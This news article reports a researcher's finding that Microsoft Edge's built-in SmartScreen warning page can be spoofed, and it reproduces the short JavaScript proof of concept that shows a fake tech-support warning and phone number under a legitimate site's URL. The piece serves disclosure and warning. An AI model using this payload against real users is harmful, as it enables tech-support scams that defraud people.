Here’s how scammers can trick Microsoft Edge into displaying fake security warnings

It’s become a depressingly predictable feature of modern Internet browsing: You’re clicking on a Google link to a well-known site – and suddenly a message pops up, warning that your computer might be at risk and to call a number for “technical support.”

Regular ITBusiness.ca readers, of course, aren’t about to call one of those numbers, but Argentinian researcher Manuel Caballero has discovered how the legitimate Microsoft SmartScreen warning message displayed by Windows 10 browser Microsoft Edge could be used to deliver such a message simply by carefully crafting the right URL.

Here’s the default screen, triggered by accessing Microsoft Corp.’s own malware test page:

actual-microsoft-edge-warning

However, as Caballero noted, the URL at the top obviously doesn’t match the content being displayed, which led him to dig for – and, after some trial and error, discover – the actual URL for the warning page:

 

ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm

 

As Caballero acknowledges, actually typing that URL into a browser will simply call up your default search engine. But getting around it involves only rudimentary coding, and reading Caballero’s sample changes, it’s easy to imagine how easily programmers could fool Edge into blocking a legitimate website.

Step one: simply replace the period in “.htm” with its ASCII code, 2E:

 

BlockSite%2Ehtm

 

Using the ASCII code instead of a punctuation mark allows programmers to append whatever hashtag and URL they want to the original link – something as innocuous as Facebook, for example:

 

window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm”+
“#http://www.facebook.com”
);

 

“So we can now open a very ugly webpage with a spoofed URL,” Caballero writes. “But BlockSite.htm is getting a couple of arguments (BlockedDomain and Host) from the location.search. Let’s use them!”

Which brings us to step two, where in the code below, Caballero defines “BlockedDomain” as “www.facebook.com” and “Host” as “Technical Support Really Super Legit CALL NOW” and “800-111-2222”:

 

window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?”+
“BlockedDomain=facebook.com&Host=Technical Support Really Super Legit CALL NOW\:”+
“800-111-2222#http://www.facebook.com”);

 

“As a bonus, when we place a telephone-like number, a link is automatically created so the user can call us with a single click,” Caballero notes. “Very convenient for these scammers.”

Over at Internet security firm Bitdefender’s news site, Hot for Security, contributor Graham Cluley connects the dots for readers, showing which parts of Caballero’s code would be displayed, and where.

smartscreen-fake-error

“If a scammer was to exploit this bug they would be able to display native, legitimate-looking warning messages that would be more likely to trick unsuspecting computer users into believing their computer was at risk and making poor decisions,” Cluley writes.

See the results for yourself:

fake-warning

When contacted about the vulnerability, a Microsoft spokesperson told ITBusiness.ca in an email that “Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible.”

“Our standard policy is to provide solutions via our current Update Tuesday schedule,” the spokesperson wrote.

Though BitDefender’s Cluley thinks it’s likely that Microsoft will fix this vulnerability in the future, it remains a potent illustration of the lengths technical support scammers can take when attempting to fool unsuspecting users – and while you might be too savvy to fall for their tricks, he notes, that doesn’t mean your friends, family, and colleagues are.

Would you recommend this article?

Share

Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication.


Jim Love, Chief Content Officer, IT World Canada

Featured Download

Eric Emin Wood
Eric Emin Wood
Former editor of ITBusiness.ca turned consultant with public relations firm Porter Novelli. When not writing for the tech industry enjoys photography, movies, travelling, the Oxford comma, and will talk your ear off about animation if you give him an opening.

Featured Story

How the CTO can Maintain Cloud Momentum Across the Enterprise

Embracing cloud is easy for some individuals. But embedding widespread cloud adoption at the enterprise level is...

Related Tech News

Get ITBusiness Delivered

Our experienced team of journalists brings you engaging content targeted to IT professionals and line-of-business executives delivered directly to your inbox.

Featured Tech Jobs